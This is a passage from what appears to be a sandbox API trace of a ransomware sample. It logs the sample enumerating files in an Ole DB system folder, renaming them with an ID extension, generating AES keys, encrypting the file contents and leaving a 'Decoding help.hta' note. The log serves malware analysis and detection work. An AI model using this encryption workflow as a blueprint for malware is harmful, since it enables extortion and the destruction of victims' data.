DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.481] lstrcmpiW (lpString1="Decoding help.hta", lpString2="oledbvbs.inc") returned -1 [0044.482] lstrlenW (lpString="oledbvbs.inc") returned 12 [0044.482] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.482] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.482] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="oledbvbs.inc" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbvbs.inc" [0044.482] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbvbs.inc" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbvbs.inc" [0044.482] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbvbs.inc", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbvbs.inc.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbvbs.inc.[ID]g9uZrLhJaygpwRm1[ID]" [0044.482] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledbvbs.inc"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbvbs.inc.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledbvbs.inc.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.483] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b07acbf, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9b07acbf, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9b0a0e20, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqloledb.dll", cAlternateFileName="")) returned 1 [0044.483] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.483] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.483] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.483] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.483] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqloledb.dll") returned -1 [0044.483] lstrlenW (lpString="sqloledb.dll") returned 12 [0044.483] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.483] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.483] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="sqloledb.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.dll" [0044.483] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.dll" [0044.483] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.483] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqloledb.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqloledb.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.484] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc4e18eb, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xbc4e18eb, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xbc38ac94, ftLastWriteTime.dwHighDateTime=0x1ca0417, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqloledb.rll", cAlternateFileName="")) returned 1 [0044.484] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.484] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.484] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.484] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.484] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqloledb.rll") returned -1 [0044.485] lstrlenW (lpString="sqloledb.rll") returned 12 [0044.485] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.485] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.485] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="sqloledb.rll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.rll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.rll" [0044.485] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.rll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.rll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.rll" [0044.485] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.rll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.rll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.rll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.485] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqloledb.rll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.rll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqloledb.rll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.485] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba82b04c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xba82b04c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xaed6d5a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x41000, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlxmlx.dll", cAlternateFileName="")) returned 1 [0044.485] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.485] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.485] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.485] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.485] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqlxmlx.dll") returned -1 [0044.485] lstrlenW (lpString="sqlxmlx.dll") returned 11 [0044.485] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.485] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.485] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="sqlxmlx.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.dll" [0044.485] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.dll" [0044.485] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqlxmlx.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqlxmlx.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.486] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba87730a, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xba87730a, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xba804eed, ftLastWriteTime.dwHighDateTime=0x1ca0417, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlxmlx.rll", cAlternateFileName="")) returned 1 [0044.486] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.486] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.486] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.486] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.486] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqlxmlx.rll") returned -1 [0044.486] lstrlenW (lpString="sqlxmlx.rll") returned 11 [0044.486] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.486] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.486] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="sqlxmlx.rll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.rll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.rll" [0044.486] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.rll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.rll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.rll" [0044.486] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.rll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.rll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.rll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqlxmlx.rll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.rll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqlxmlx.rll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.486] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x305d2000, ftCreationTime.dwHighDateTime=0x1c8e1ec, ftLastAccessTime.dwLowDateTime=0x516f5b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x305d2000, ftLastWriteTime.dwHighDateTime=0x1c8e1ec, nFileSizeHigh=0x0, nFileSizeLow=0x29618, dwReserved0=0x0, dwReserved1=0x0, cFileName="xmlrw.dll", cAlternateFileName="")) returned 1 [0044.486] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.486] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.487] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.487] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.487] lstrcmpiW (lpString1="Decoding help.hta", lpString2="xmlrw.dll") returned -1 [0044.487] lstrlenW (lpString="xmlrw.dll") returned 9 [0044.487] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.487] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.487] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="xmlrw.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll" [0044.487] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll" [0044.487] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\xmlrw.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\xmlrw.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0044.488] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\xmlrw.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x70c [0044.488] CreateFileMappingA (hFile=0x70c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x710 [0044.488] CryptAcquireContextA (in: phProv=0x1cd1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1cd1fcec*=0x3448fa0) returned 1 [0044.489] CryptGenKey (in: hProv=0x3448fa0, Algid=0x6610, dwFlags=0x1, phKey=0x1cd1fce8 | out: phKey=0x1cd1fce8*=0x5e3070) returned 1 [0044.489] CryptExportKey (in: hKey=0x5e3070, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1cd1fbe4, pdwDataLen=0x1cd1fce4 | out: pbData=0x1cd1fbe4*, pdwDataLen=0x1cd1fce4*=0x2c) returned 1 [0044.489] MapViewOfFile (hFileMappingObject=0x710, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x29600) returned 0x9d50000 [0045.659] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cd1fbe4*, pdwDataLen=0x1cd1fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1cd1fbe4*, pdwDataLen=0x1cd1fcf8*=0x100) returned 1 [0048.859] CryptEncrypt (in: hKey=0x5e3070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x9d50000, pdwDataLen=0x1cd1fce4*=0x29600, dwBufLen=0x29600 | out: pbData=0x9d50000*, pdwDataLen=0x1cd1fce4*=0x29600) returned 1 [0048.888] UnmapViewOfFile (lpBaseAddress=0x9d50000) returned 1 [0048.891] CloseHandle (hObject=0x710) returned 1 [0048.891] CryptDestroyKey (hKey=0x5e3070) returned 1 [0048.891] CryptReleaseContext (hProv=0x3448fa0, dwFlags=0x0) returned 1 [0048.891] SetFilePointerEx (in: hFile=0x70c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.891] WriteFile (in: hFile=0x70c, lpBuffer=0x1cd1fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1cd1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1cd1fbe4*, lpNumberOfBytesWritten=0x1cd1fcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.926] WriteFile (in: hFile=0x70c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1cd1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1cd1fcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.926] CloseHandle (hObject=0x70c) returned 1 [0051.650] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.291] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x305d2000, ftCreationTime.dwHighDateTime=0x1c8e1ec, ftLastAccessTime.dwLowDateTime=0x5f3710f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x305d2000, ftLastWriteTime.dwHighDateTime=0x1c8e1ec, nFileSizeHigh=0x0, nFileSizeLow=0x1e218, dwReserved0=0x0, dwReserved1=0x0, cFileName="xmlrwbin.dll", cAlternateFileName="")) returned 1 [0055.291] lstrcpyW (in: lpString1=0x1119bc20, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0055.291] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0055.291] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0055.291] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0055.291] lstrcmpiW (lpString1="Decoding help.hta", lpString2="xmlrwbin.dll") returned -1 [0055.291] lstrlenW (lpString="xmlrwbin.dll") returned 12 [0055.291] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0055.291] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0055.291] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="xmlrwbin.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll" [0055.291] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll" [0055.292] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0055.292] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole 